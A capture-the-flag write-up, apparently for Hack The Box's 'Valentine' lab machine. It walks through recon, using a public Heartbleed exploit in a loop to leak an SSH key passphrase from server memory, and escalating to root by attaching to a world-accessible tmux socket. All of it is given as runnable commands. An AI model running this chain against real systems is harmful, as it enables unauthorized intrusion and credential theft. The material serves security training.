Post

Valentine

An HTTPS service running OpenSSL 1.0.1 is vulnerable to Heartbleed (CVE-2014-0160), which leaks the passphrase for an encrypted RSA private key found in a world-accessible /dev/ directory, granting SSH access as hype.

Valentine

Overview

Valentine is an easy Linux machine. The web server exposes a hex-encoded encrypted RSA private key in a public /dev/ directory while also running OpenSSL 1.0.1 — vulnerable to CVE-2014-0160 (Heartbleed). Repeatedly triggering the Heartbleed read leak against the HTTPS service recovers the POST body text=heartbleedbelievethehype from server memory — the passphrase for the SSH key — yielding a shell as hype. Root has a persistent tmux session bound to a world-accessible Unix socket at /.devs/dev_sess; attaching to it executes arbitrary commands as root.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

High Real-Life and CVE scores reflect that Heartbleed is a genuine, weaponized critical vulnerability still found in unpatched production environments; the tmux socket misconfiguration is equally realistic.

Recon

PortServiceNotes
22/tcpOpenSSHSSH — used for foothold
80/tcpApache httpdHTTP — hosts encode/decode app, /dev/ directory listing
443/tcpApache httpd (SSL)HTTPS — OpenSSL 1.0.1, Heartbleed-vulnerable
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p22,80,443 -sC -sV -Pn 10.10.10.X

The HTTPS service reports OpenSSL 1.0.1, which is the version range affected by Heartbleed. The site theme is Valentine-themed with a bleeding heart image — a direct hint.

Enumeration

Browsing port 80 reveals an encode/decode application. The /dev/ directory is world-accessible and lists two files:

1
2
3
curl -s http://10.10.10.X/dev/
curl -s http://10.10.10.X/dev/hype_key > hype_key.hex
curl -s http://10.10.10.X/dev/notes.txt

hype_key is a hex dump of an AES-128-CBC encrypted RSA private key. notes.txt hints the encoder/decoder is not finished. Decode the hex to recover the PEM:

1
2
cat hype_key.hex | tr -d ' \n' | xxd -r -p > hype.key
head -3 hype.key

The key header confirms encryption (Proc-Type: 4,ENCRYPTED, DEK-Info: AES-128-CBC). A passphrase is needed. Confirm Heartbleed on port 443:

1
nmap -p 443 --script ssl-heartbleed 10.10.10.X

Output: VULNERABLE — the service leaks process memory on demand.

Foothold

The application POSTs text=heartbleedbelievethehype to /encode.php over HTTPS. When that request is in process memory, a Heartbleed read leaks the POST body. Run the public exploit repeatedly until the base64-encoded POST body appears:

1
2
3
for i in $(seq 1 50); do
  python2 /usr/share/exploitdb/exploits/multiple/remote/32764.py 10.10.10.X -p 443 2>/dev/null
done | strings | grep -oP '[a-zA-Z0-9+/=]{20,}' | sort | uniq -c | sort -rn | head -20

Decode the recurring base64 candidate to recover the passphrase heartbleedbelievethehype. Verify it against the encrypted key:

1
openssl rsa -in hype.key -passin pass:heartbleedbelievethehype -check 2>&1 | head -1

Output: RSA key ok. Convert to an unencrypted key and SSH as hype:

1
2
3
openssl rsa -in hype.key -passin pass:heartbleedbelievethehype -traditional -out hype_rsa.key
chmod 600 hype_rsa.key
ssh -i hype_rsa.key -o PubkeyAcceptedKeyTypes=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa [email protected]

Shell lands as uid=1000(hype).

User flag

1
cat ~/user.txt   # HTB{...}

Foothold lands directly as hype, who owns user.txt — no lateral movement required.

Privilege Escalation

Enumerate running processes from the hype shell:

1
ps aux | grep tmux

Output shows root is running /usr/bin/tmux -S /.devs/dev_sess. The socket is readable by hype. Send a command to the root tmux server to read the root flag:

1
2
tmux -S /.devs/dev_sess new-window 'cat /root/root.txt > /tmp/r.txt && chmod 777 /tmp/r.txt'
cat /tmp/r.txt

Alternatively, attach interactively:

1
tmux -S /.devs/dev_sess attach

This gives a full interactive root shell. The CWE-732 (incorrect permission assignment for critical resource) on the socket combined with CWE-269 (improper privilege management) is the root cause — the socket should be chmod 700 and owned exclusively by root.

Root flag

1
cat /root/root.txt   # HTB{...}

Full root compromise achieved via the world-accessible tmux socket bound to root’s persistent session.

This post is licensed under CC BY 4.0 by the author.